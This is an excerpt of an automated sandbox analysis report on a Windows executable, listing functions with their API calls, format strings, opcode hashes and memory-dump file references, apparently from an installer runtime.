                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                                            Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                                            Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                                            Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                                            Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                                            Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                                            Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
